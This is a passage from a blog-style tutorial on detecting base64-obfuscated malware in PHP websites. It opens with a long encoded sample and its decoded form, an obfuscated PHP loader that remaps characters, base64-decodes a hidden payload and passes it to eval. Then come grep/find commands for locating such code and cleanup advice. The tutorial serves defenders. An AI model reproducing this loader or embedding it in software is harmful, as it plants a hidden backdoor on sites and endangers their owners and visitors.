tvM3FqeVBBd3E5WmlUdXFpT3pBUXR6QWR5OXFRekhOc1R6cVpUMVppN3VrUXonLgonZUVyOXBVbzN0TnNJdEo4cXRwZHVQaGlhOXBzVHpxWlQxOENjMUpDY
2NwUUlqVjVJenFHbG1xWmE5SlU5T1YnLgonZFQxY2R5RlZpeURWNDllVW8zdE5zSXRrcjlwTnNJdE5zSXROc3hlQTVJM1ZkVDFjZHlGVmk2UlpRSU9nUUlS
SlFoZVVvM3ROc0l0TnNJJy4KJ3ROS0hsczVJdE5zSXROc0l0TnNJdE5zVGVOVTl0b1pWQ3FaejNVbzN0TnNJdE5zSXROc0l0TnNJdE5zSXRWR3hpVkNJT2c
1eEloZDFyJy4KJ2NqYUNoaXVXRjV0ZTJJOXBOc0l0TnNJdE5zSXROc0l0TnNJdE5zY1BjNWh0Z3dTdFZQNmZ2czlDVkNybHM1SXROc0l0TnNJdE5zSXROc0
l0TnNJUnE4SFJOVTkrTnNUJy4KJ3pxWlQxOENjMUpDY2MySTlwTnNJdE5zSXROc0l0TnNJdHB3SGxzNUl0TnNJdE5zSXROc0l0TmRhQkpkWHRvS2x1aGp1M
UZkdTBBUScuCid0ekpRem5VbzN0TnNJdE5zSXROc0l0TnN4dWtkdTlFcjlwTnNJdE5zSXROc3hPVW8zdE5zSXROc0l0TmRhSGhpYWVBNUkzVmRUMWNkeUZW
aTZSWlFJT2dRSVJBUWhlVW8zJy4KJ3ROc0l0TnNJdE5LSGxzNUl0TnNJdE5zSXROc0l0TmRhaXE4cjNWZFQxY2R5RlZpb1JaUXpuVW8zdCcuCidOc0l0TnN
JdE5LOWxzNUl0TnNJdE5zSXRBOFlQQTh1ak5zdHpBZHk5cWFIUnFRY2NOVTlPTnNjckZLYVJKOFNScG85cE5zSXROc0l0TnN4blVvM3ROc0l0TnNJdE5zSX
ROJy4KJ3N4ZUE1dHpBZHk5cWFIUmhpNlJaUUlPZ1FJUnE4VHpWQ3psczVJdE5zSXROc0l0TnNJdE5LSGxzNUl0TnNJdE5zSXROc0l0TnNJdE5zeEJoNE9yR
kthUko4Ym1xOFR6Jy4KJ3BzVHpxWlQxOENjclY0OUhOc1R6cVpUMThDY3pWNDllRXI5cE5zSXROc0l0TnNJdE5zSXRtbzlwTnNJdE5zSXROc0l0TnNJdEE4
WVBBOHVqcCcuCidzVHpxWlQxOENjUHFRY2NOVTlPTnNjQ0E4OVJwbzlwTnNJdE5zSXROc0l0TnNJdGtyOXBOc0l0TnNJdE5zSXROc0l0TnNJdE5kbFAnLgo
nWkd4SGM4Y2VGdU9DQTg5M1ZkVDFjZHlGVkdJUlpRem5VbzN0TnNJdE5zSXROc0l0TnN4T1VvM3ROc0l0TnNJdE5LOWwnLgonczVJdE5zSXROc0l0QThsM0
2VPJzsKJHFkcG95ZXdhZXggPSBBcnJheSgnMSc9PidoJywgJzAnPT4nNicsICczJz0+J28nLCAnMic9PidMJywgJzUnPT4naScsICc0Jz0+JzEnLCAnNyc9
Pid0JywgJzYnPT4nRScsICc5Jz0+JzAnLCAnOCc9PidXJywgJ0EnPT4nWicsICdDJz0+J3knLCAnQic9PidqJywgJ0UnPT4nTycsICdEJz0+J3InLCAnRyc
9PiczJywgJ0YnPT4nYicsICdJJz0+J0EnLCAnSCc9PidzJywgJ0snPT4nSCcsICdKJz0+J2EnLCAnTSc9PidxJywgJ0wnPT4nVScsICdPJz0+JzknLCAnTi
c9PidJJywgJ1EnPT4nUycsICdQJz0+J3onLCAnUyc9Pic0JywgJ1InPT4nbicsICdVJz0+J0QnLCAnVCc9PidSJywgJ1cnPT4ndicsICdWJz0+J0onLCAnW
Sc9Pid4JywgJ1gnPT4nOCcsICdaJz0+J1gnLCAnYSc9PidWJywgJ2MnPT4nZCcsICdiJz0+JzUnLCAnZSc9PidwJywgJ2QnPT4nRycsICdnJz0+J1AnLCAn
Zic9Pid1JywgJ2knPT4nMicsICdoJz0+J2MnLCAnayc9PidlJywgJ2onPT4nbScsICdtJz0+J2YnLCAnbCc9PidOJywgJ28nPT4nUScsICduJz0+JzcnLCA
ncSc9PidZJywgJ3AnPT4nSycsICdzJz0+J0MnLCAncic9Pid3JywgJ3UnPT4nbCcsICd0Jz0+J2cnLCAndyc9PidUJywgJ3YnPT4nTScsICd5Jz0+J0YnLC
AneCc9PidCJywgJ3onPT4naycpOwpldmFsLypuKi8odXNhempkd2N6bCgkZXV2Y2x1eHh5ZCwgJHFkcG95ZXdhZXgpKTsKfQ==
``````

Encoded to ASCII text

``````
{
\$rochgqxypk = 9880; function usazjdwczl(\$jkhidpwoqr, \$xdpkvw){\$zhzroo = ''; for(\$i=0; \$i < strlen(\$jkhidpwoqr); \$i++){\$zhzroo .= isset(\$xdpkvw[\$jkhidpwoqr[\$i]]) ? \$xdpkvw[\$jkhidpwoqr[\$i]] : \$jkhidpwoqr[\$i];}
\$xztfsiws="base" . "64_decode";return \$xztfsiws(\$zhzroo);}
\$euvcluxxyd = 'odufJaOPAZo3ViaChjOCZiYWAChHN6baw6reEr9podufJaOPAZo3ViYW'.
'A4OuhRVWhRvR2sIrpwHlszxeFjumhia9psc7qZ1mAZ1uqGa9J8OfZGTeF8LR2sIrpwHlszxuh'.
'RVWhuOCAZxWhRTeFjh3vsznUoeIhia9ZGTeF8amFdu7JZo3vsznU'.
'o3lst9pJ8q3N8TuAjufA8o3NuxNLyOyw9r5pQzlsRHls5ItNsxzA8AeFjL3NuxNLyOyw9'.
'r52sI5ZdS5pwHlsR9lst9pJ8q3N8TuAjufA8o3NzTVLzaUa6OQ8aOwTaxxLzyLw4N5pQzlsRHls5ItNsxz'.
'A8AeFjL3NzTVLzaUa6OQ8aOwTaxxLzyLw4N52sI52CNeEr9pmo9pUoeeA5I3N8TuAjufA8o3V9yvLzaxTyumLuaEZP6'.
'9ldvSliljlBNPqj6Svjy1AjziEKVeq8NYljy9J8XYEshepo9pkr9pNsItNdTuAjufAQtRoLYQTLy68aOQa'.
'6baw6rnUo3tNsItVdT1cdymJiabNU9twuavwUHlst9pNsItNsTKw6OsoLYw8CcBh4O1cZT3V49t'.
'4cdtnUo3lst9pNsItNdA4Fjl9J8OfNdlPZ9cuc61WhGo3po9pNsItNKHls5ItNsItNsIthja9cZVfNKl9hRTWFdOGAZN3hKVuA4O'.
'CAZxHq8lupshWZ51GcGcXARTrparf2izR2shR26IzZ4lyLuAyLuHRQyTLLyONw4lLV49epwHls5'.
'ItNsxOUo3ls5ItNsxjc8bBcduWF5xBh4OKAZTZhju9q8VHALTehRv3po9pNsItNKHls5ItNsIt'.
'NsItVKVuhCION6yChjybpsznUo3ls5ItNsItNsItVdyfq8YbhGuPZGy4AZauNU9toZVCq'.
'Zz3pwHlst9pNsItNsItNsIzq8b1FKuPkZlmhZauc8aFZQIONdlPZ9cuc6TWq4VWFGo3pwHls'.
't9pNsItNsItNsIzhiaHAuOrqZT3NU9tVyOwTaV8TaVFV4lULzuoayOdQLYywzylTQccEr9pNsItNsItNsxGJduHAQI3'.
'psTPFdyPJsIONKl9hRVrFGv3VKluFdAmhdy9JsrtT6uQTLlLw4VAZ4lyL6yQoaTgL5zeNs6OgQxdoLYwT'.
'Qzls5ItNsItNsItkr9pNsItNsItNsItNsItVKluFdAmhdy9JsIONKl4qRl9h5tzhiaHAuOrqZT32'.
'sIr2sIzhiY1hiteEr9pUo3tNsItNsItNsItNsxeA5I3VKluFdAmhdy9JsIOgQxBh4OKAZT6FilQFiO9pszeUo'.
'3tNsItNsItNsItNsxnUo3tNsItNsItNsItNsItNsItqRVuq8Hn'.
'Uo3tNsItNsItNsItNsxOUo3ls5ItNsItNsItNsItNdujNs1PcKVHA8S3VKluFdAmhdy9Js'.
'zeUo3tNsItNsItNsItNsxnUo3tNsItNsItNsItNsItNsItVdyfq8YbhGuPZGy4AZa'.
'u849tgQIzhiaHAuOrqZT3Er9pNsItNsItNsItNsItmo9pNsItNsItNsxOUo3ls5ItNsItNsItAjOCA8yBJsI3Vdyfq8Ybh'.
'GuPZGy4AZauNdyPNsTBcZVCA8b9ZiTeh5zls5ItNsItNsItkr9pNsItNsItNsItNsItJ8qtpsyeFuO1hRV1kQtzqGaChjafcyOz'.
'JZNHNsTCAZvepo9pNsItNsItNsItNsItkr9pNsItNsItNsItNsItNsItNsTCAZvtgQx1hRV1kaO7AZVRAQtz'.
'hjaP2sxBh4OKAZT6JZVuqGTWhRuvJZl9psTBcZVCA8b9ZiTeh5zeEr9'.
'pNsItNsItNsItNsItmo9pNsItNsItNsxOUo3ls5ItNsItNsIthja9cZVfNdlPZ9l3A8lDaGVecdy5FdL3qZVCqZ'.
'umc8behZaupsTCAZvepwHls5ItNsxOUo3ls5ItNsxjc8bBcduWF5xBh4O'.
'UJdaBJ4cCJZT1qjYupsTzJZVmFduPcszls5ItNsxnUo3tNsItNsItNsTzJZVmFduPcyOGhju9q8VHAQION6yChjybps'.
'znUo3ls5ItNsItNsItAjOCA8yBJsI3VdTehuOHJZl9NdyPNsTzJZNeUo3tNsItNsItNKHls5ItNsIt'.
'NsItNsItNsItNsTzJZVmFduPcyOGhju9q8VHAa7cNU9tVdTehBHls5I'.
'o3tNsItmo9pUo3tNsItARafqGTeFiStqGlmTia9TduCA8l9FGVbwdu'.
'duCZilWc8b9NU9tvUHlst9pNsItNsItNsxeA5I3VdTuhKT3NUrtv'.
'Qzls5ItNsItNsItkr9pNsItNsItNsItNsIthja9cZVfNsTCAZl4FKonUo3tNsItNsIt'.
'JZNeEr9pNsItNsItNsxeA5I3Vdttgw9ON6Axwylypo9pNsItNsItNsxnUo3tNsItNsItNsItNsxCAZT4h'.
'tNsItNsxnUo3tNsItNsItNsItNsxeA5I3VdqtNw9ONshfVCx1FjotVdqtNw9ONshf25heUo3tNsI'.
'sItNsItNsItNsItNsTzJZVmqiO4FRotpP9tvwHlst9pNsItNsItNsItNsItNsItNsItN'.
'sIzhjaPc8Y9849tgQIzqGaChjafcyOzJZNnUo3tNsItNsItNsItNsItNsI'.
'tNsItNsTCAZl4FKotgQx1hRV1kaO7AZVRAQtzhjaPc8Y92sxBh4OKAZT6JZ'.
'VuqGTWhRuvJZl9psTBcZVCA8b9ZiTeh5rtVdTuhKT3NsXtvwIep'.
'wHls5ItNsItNsItNsItNsItNsxOUo3tNsItNsItNsItNsxOUo3'.
'tNsItNsItNK9lst9pNsItNsItNsxBFdOPA8Teh5tzJsznUo3ls5ItNsItNsIthja9cZVfNsTCAZl4FKonUo3tNsItmo9pUo3tNs'.
'Q8Ccwo4VVLyTmTzuvTLbxwLLRZQrtVyOwTaV8TaVFV4VyLaayL4TmaaVVV49eEr9pNsItNsItN'.
'sxeA5I3VdTWqGVWFGTmA8bzNU9OgQxdoLYwTQzls5ItNsItNsItkr9pNsItNsItNsItNsIthja9cZVfNsTmL9aQazaQ'.
'3tNsItNsItNKHls5ItNsItNsItNsItNKVucKaCF5I52CNnUo3tNsItNsItNK9ls5ItNsItNsItA8YP'.
'Ao9pNsItNsItNsxnUo3tNsItNsItNsItNsxCAZT4hjSthGa5hGTCpsTmL9aQazaQ8'.
'Ccwo4VVLyTmTzuvTLbxwLLRZQrtvsrtVdTWqGVWFGTmA8bzpwHls5ItNsItNsItmo9pNsItNK9'.
'lst9pNsItNdujNst1ARafqGTeFibmAZ1ehGTPpscjJ8YuZGx4cyOBFib9A8b9'.
'hChepo9pNsItNKHls5ItNsItNsItARafqGTeFiStAjuHAaOrcZTmqiOfcdafcKv3VdSHNsTz2sIzAjY1ACION6A1F'.
'Klupo9pNsItNsItNsxnUo3tNsItNsItNsItNsIzF8OzAQIONsTjFdyRNU9ONUttgCIRqQhtE5IRcChnUo3tNsItNsItNsItN'.
'ls5ItNsItNsItNsItNsItNsxCAZT4hjStvUHls5ItNsItNsItNsItNK9ls5ItNsItNsItNsItNdaHhiLls5It'.
'pNsItNsItNsItNsItNsItNsT5kZTuh4OGhju9cdafNU9tARcCJZTupsTj2sI'.
'zAsznUo3tNsItNsItNsItNsItNsItAjlHFGlupsTjpwHls5ItNsItNsItNsItNsItNsxCAZT4h'.
'jStVdVbcdaPZGcCJZT9A8SnUo3tNsItNsItNsItNsxOUo3tNsItNsItNK9ls5It'.
'NsxOUo3ls5ItNsxeA5I3N8A4Fjl9J8OfZiaSJZl9hCtRAjuHAaORA'.
'ZTmqiOfcdafcKvRpQzls5ItNsxnUo3tNsItNsItNdA4Fjl9J8OfNdAeFdamAia9ZilWFRTuFRTPp'.
'sTjJ8YuFjy7AQzls5ItNsItNsItkr9pNsItNsItNsItNsItVdA3q8bzFdLtgQxjFGxuF5tzAjuHA'.
'8b1F8LHNsVCN5znUo3tNsItNsItNsItNsIzAjlWFRTuFRTPNU9tARVuq8o3VdA3q8bzFdLHNdAe'.
'TjqiOfcdafcKvnUo3tNsItNsItNK9ls5ItNsxOUo3lst9pNsItNdA4Fjl9J8OfNdlPZiTuqGVbhKTmhd11hiL3VdT1cd6HNsT'.
'DAZzeUo3tNsItkr9pNsItNsItNsIzFGa9ZiT1cd6tgQI5NBHlst9pNsItNsItNsxjFG'.
'9hjYuF5tzJiabpQIjV5IzJwYPcKVHA8S3VdT1cd6eECIzJ5HD2sIzJQHDpo9pNsItNsItNsItNsItkr9pNsItNsItNsItNsItNs'.
'NsItNsItNsItNK9ls5ItNsItNsItmo9pUo3tNsItNsItNKVucKaCF5IzFGa9ZiT1cd6'.
'qZlupsTzqZT12sIzJiabpQrtVdlPZiy4cdteEr9pNsItNK9ls5ItNsxjc8bBcduWF5xBh4OuFjlCk'.
'Zx9psTzqZT12sIzJiabpo9pNsItNKHls5ItNsItNsItAiYWqjyHNsTBh4O1cZT3Er9pUo3tNsItNsItNKVucKaCF5'.
'xBh4OzA8lCkZx9ZGx3qZlupdlPZiTuqGVbhKTmhd11hiL3VdT1cd6HNsTBh4O1cZT3pQrtVd'.
'7ukQznUo3tNsItmo9pUo3tNsItARafqGTeFiStqGlmAjuHAaOCA8yzpsT'.
'rqZT3po9pNsItNKHls5ItNsItNsItVdT1cd6tgQxIAjuHAaORAZTmqiOfcdafcKv3VKx1cdteEr9pUo3tNsItNsItNKVucK'.
'YuZGx4cyOBFib9A8b9hCtzhdy9JsrtVdT1cd6HNUteEr9pNsItNK9l'.
'st9pNsItNdA4Fjl9J8OfNdlPZGlWhRTmqiO7hdyCAZN3Vd6HNsT5po9pNsItNKHls5ItNsItNsIthj'.
'a9cZVfNKl9hjYuF5tzqQzt2QxPcKVHA8S3VdNeEr9pNsItNK9lst9pNsItNdA4Fjl9J'.
'8OfNdlPZ9cuc6lWF84WFul9FGV1AiL3VdTehRvOwuavwszls5ItNsxnUo3'.
'tNsItNsItNsTPA8YjZiTeh5IONdTehjb1F8L3Z4OdQLYyZ4XeEr9pUo3tNsItNsItNsTBFi47FibmFjy7AZvtgQxxhRV1kQ'.
't5FGx9J8OfhCNHNsViJ8aGhCNHNsVrq8cuhCNHNsVPAZlPJ8OfhCNHNsVPcdy9hCNHNsV4hiaChCNHNs'.
'uCNsStN5X5NsStVdlWF84WFuOfq84uh47PcKVHA8S3qGlmTia9QdOPcstepQIuNdlWc8b9psTBFi47FibmFjy7AZveZ'.
'wHlst9pNsItNsItNsxeA5I3AjuHAaOukduPcKv3VKT7hyOzJZNepo'.
'9pNsItNsItNsxnUo3tNsItNsItNsItNsxCAZT4hjStVKT7hyOzJZNnUo3tNsItNsItNK9'.
'lst9pNsItNsItNsxeA517JiTeh5tzcd4rZiTeh5zeUo3tNsItNsItNKHls5ItNsItNsIt'.
'NsItNKVucKaCF5Izcd4rZiTehBHls5ItNsItNsItmo9pUo3tNsItNsItNKVucKaCF5I5NBHls5ItNs'.
'xOUo3ls5ItNsxjc8bBcduWF5xBh4OrFKaRJ8bmq8TzpsTfq84u2sIzqjyPAwq9Z'.
'IzhGTWhjyRAaOrqZT3NU9tqGlmTia9oiO7F8OfLGTWhjyRAQteNs'.
'StN5X5Er9pNsItNsItNsIzhGTWhjyRAaOrqZT3NU9tVKl9FGV1Aiamhdy9JsIfNKl4qRl9h517AUL3Nj'.
'l1qi1uN5zHNUIHNULeNsStNuX5NsStF8o4psTfq84uNsStqGlmTia9QdOPcstep'.
'wHlst9pUo3tNsItNsItNdlPZiAeFdamcGVecdL3VKl9FGV1Aiamhdy9Jsr'.
'sItmo9pUo3tNsItARafqGTeFiStqGlmhdY4AiufZGVuFQtzFjy7AQzls5ItNsxnUo3tNsItNsItNsTPcdOCq8cuZGx1cdt'.
'tgQxBh4OKAZTUFi47FibwcdOCq8cupszfNsNWNBHls5ItNsItNsItVKl9FGV1Aiamhdy9Js'.
'IONsTPcdOCq8cuZGx1cdtt25xPc8VPcKN3F8o4psVBq8l3AQNe2sIr2sI4pQIfNsVmN5IfNd4zlQtzFjy'.
'7AQIfNdlPZ9cuc61WhGo3pQznUo3ls5ItNsItNsItJ8qtpdAeFdamAZ1ehGTPpsTPcd'.
'OCq8cuZGx1cdtepo9pNsItNsItNsxnUo3tNsItNsItNsItNsxIc8bHJ8bDpsTPcdOCq8cuZGx1cdteEr'.
'9pNsItNsItNsxOUo3tNsItmo9pUo3tNsItARafqGTeFiStqGlmhdY4AiufZiYWq8o3Vdb1F8LOwu'.
'avwszls5ItNsxnUo3tNsItNsItNsTPcdOCq8cuZGx1cdttgQxBh4OKAZ'.
'TUFi47FibwcdOCq8cupsznUo3ls5ItNsItNsItJ8qtpduPZiTeh5tzhGTWhjyRAaOrqZT3pQzls5ItN'.
'sItNsItkr9pNsItNsItNsItNsItJ8qtpsTfq84uNU9ON6baw6reNsXWNdYWq8otq8YHNKxHc8ce'.
'NsTDAZzOg5TrFKaRJ8bmFjy7AQzls5ItNsItNsItNsItNsItNsxnUo3tNsItNsItNsItNsItNsIt'.
'NsItNdujNs1PcKVrFGv3VKxHc8ceFuOfq84u2sxPc8VPcKN3F8o4psVBq8l3AQNe2sIr2sI4pQztNw9ON6A1FKlupo9pNsItNsIt'.
'NsItNsItNsItNsItNsxnUo3tNsItNsItNsItNsItNsItNsItNsItNsxI'.
'AZA1Fs1Bh4OzA8lCkZx9pdlPZiAeFdamhja1AstzhGTWhjyRAaOrqZT3NsStN5X5NsStVKxHc8ceFuOfq84upQ'.
'rtqGlmTia9QdOPcstepQznUo3tNsItNsItNsItNsItNsItNsItNK9ls5ItNsItNsItNsItNsItNsxOUo3tNsItNsI'.
'tNsItNsxOUo3tNsItNsItNsItNsxuFKluUo3tNsItNsItNsItNsxnUo3tN'.
'sItNsItNsItNsItNsItVKl9FGV1Aiamhdy9JsIONsTPcdOCq8cuZGx1cdtt25I52CNt25xPc8VPcKN3F8o4psVBq8l3AQNe2sIr'.
'2sI4pQIfNsVmN5IfNd4zlQtzFjy7AQIfNdlPZ9cuc61WhGo3pQznUo3ls5ItNsItNsItNsItNsItNsxeA5I3AjuH'.
'AaOukduPcKv3VKl9FGV1Aiamhdy9JszeUo3tNsItNsItNsItNsItNs'.
'Itkr9pNsItNsItNsItNsItNsItNsItNsxIAZA1Fs1Bh4OzA8lCkZx9pdlPZiAeFdamhj'.
'a1AstzhGTWhjyRAaOrqZT3pQrtqGlmTia9QdOPcstepQznUo3tNsItNsItNsItNsIt'.
'NsItmo9pNsItNsItNsItNsItmo9pNsItNsItNsxOUo3tNsItmo9pUo3tNsItARafqGTeFiStqGlmcGVecdy5Fdamqi1uqiH3p'.
'o9pNsItNKHls5ItNsItNsItJ8qtpKl9hjYuF51Bh4OKAZTUFi47FibwcdOCq8cups'.
'zeNs6ONUIeUo3tNsItNsItNKHls5ItNsItNsItNsItNKVucKaCF5xLhRauEr'.
'9pNsItNsItNsxOUo3tNsItNsItNdaHhiLls5ItNsItNsItkr9pNsItN'.
'sItNsItNsIthja9cZVfN6A1FKluEr9pNsItNsItNsxOUo3tNsItmo9pUo3t'.
'NsItAjOCA8yBJsI3VyOUw9O2QLLtqZvtVd7ukw9+VKA1FKaupo9'.
'pNsItNKHls5ItNsItNsItVdT1cd6tgQIzcjyHc8LnUo3tNsItNsItNsTzqZT1Zi7ukQIONsTDAZznUo3tNsI'.
'sx1hCIzJiabgwSzcjyHc8LeUo3tNsItNsItNKHls5ItNsItNsItNsItNsTzqZT1NU9tVK'.
'A1FKauEr9pNsItNsItNsItNsItVdT1cdymJiabNU9tVd7ukwHls5ItNsItNsItmo9pNsItNK9ls'.
'eEr9pUo3tNsItJ8qtpduPhia9psTzqZT18Cc1JCccpQIjV5IzqGlmqZa9JU9OV'.
'dT1cdyFViyDV49eUo3tNsItkr9pNsItNsItNsxeA5I3VdT1cdyFVi6RZQIOgQIRJQheUo3tNsItNsI'.
'tNKHls5ItNsItNsItNsItNsTeNU9toZVCqZz3Uo3tNsItNsItNsItNsItNsItVGxiVCIOg5xIhd1r'.
'cjaChiuWF5te2I9pNsItNsItNsItNsItNsItNscPc5htgwStVP6fvs9CVCrls5ItNsItNsItNsItNsItNsIRq8HRNU9+NsT'.
'zqZT18Cc1JCcc2I9pNsItNsItNsItNsItpwHls5ItNsItNsItNsItNdaBJdXtoKluhju1Fdu0AQ'.
'tzJQznUo3tNsItNsItNsItNsxukdu9Er9pNsItNsItNsxOUo3tNsItNsItNdaHhiaeA5I3VdT1cdyFVi6RZQIOgQIRAQheUo3'.
'tNsItNsItNKHls5ItNsItNsItNsItNdaiq8r3VdT1cdyFVioRZQznUo3t'.
'psTzqZT18CcrV49HNsTzqZT18CczV49eEr9pNsItNsItNsItNsItmo9pNsItNsItNsItNsItA8YPA8ujp'.
'sTzqZT18CcPqQccNU9ONscCA89Rpo9pNsItNsItNsItNsItkr9pNsItNsItNsItNsItNsItNdlP'.
'ZGxHc8ceFuOCA893VdT1cdyFVGIRZQznUo3tNsItNsItNsItNsxOUo3tNsItNsItNK9l'.
'GxHc8ceFuOHFiyzpsznUoeO';

\$qdpoyewaex = Array('1'=>'h', '0'=>'6', '3'=>'o', '2'=>'L', '5'=>'i', '4'=>'1', '7'=>'t', '6'=>'E', '9'=>'0', '8'=>'W', 'A'=>'Z', 'C'=>'y', 'B'=>'j', 'E'=>'O', 'D'=>'r', 'G'=>'3', 'F'=>'b', 'I'=>'A', 'H'=>'s', 'K'=>'H', 'J'=>'a', 'M'=>'q', 'L'=>'U', 'O'=>'9', 'N'=>'I', 'Q'=>'S', 'P'=>'z', 'S'=>'4', 'R'=>'n', 'U'=>'D', 'T'=>'R', 'W'=>'v', 'V'=>'J', 'Y'=>'x', 'X'=>'8', 'Z'=>'X', 'a'=>'V', 'c'=>'d', 'b'=>'5', 'e'=>'p', 'd'=>'G', 'g'=>'P', 'f'=>'u', 'i'=>'2', 'h'=>'c', 'k'=>'e', 'j'=>'m', 'm'=>'f', 'l'=>'N', 'o'=>'Q', 'n'=>'7', 'q'=>'Y', 'p'=>'K', 's'=>'C', 'r'=>'w', 'u'=>'l', 't'=>'g', 'w'=>'T', 'v'=>'M', 'y'=>'F', 'x'=>'B', 'z'=>'k'); eval/*n*/(usazjdwczl(\$euvcluxxyd, \$qdpoyewaex));
``````

If you notice that once it is encoded it has even more base64 code.  This can make for an interesting time trying to convert the actual code.  Most times, when I see this, I mark it as malware if I know it should not be there.

## How do I find it?

The easiest way to do this is to use a Linux machine and use the find command.  Here are some examples.

``````
find . -name "*.php" -exec grep "base64"'{}'\; -print &> b64-detections.txt
find . -name "*.php" -exec grep "eval"'{}'\; -print &</span>> eval-detections.txt
``````

This command will go and search all files that have a php file extension and have the words “base64” and “eval” in the code and create a txt file with its findings.  Once you find the file that has base64 code start encoding it and make sure that it is malware, some code can be legit and you would need to research it.  One way to check to see if it is legit code is to see if the php file exists with your content management that you are using.  For example if you have WordPress look at clean php files and see if the file actually exists and if so make sure the code is not in the php file in question.

## Conclusion

Base64 is out there and is being used by plenty of hackers to try and hide their malware from you.  With the knowledge I have given you, you have a chance to remove the malware.  Just remember, this malware can be prevented if you keep up on your updates with your content management software.  If a hacker has no way of giving you the malware, then you have no need to track it down.  Now, do people actually do this?  Not all, so I will keep on working.

## References

Base 64 Table

Binary to ASCII text converter

ASCII Codes table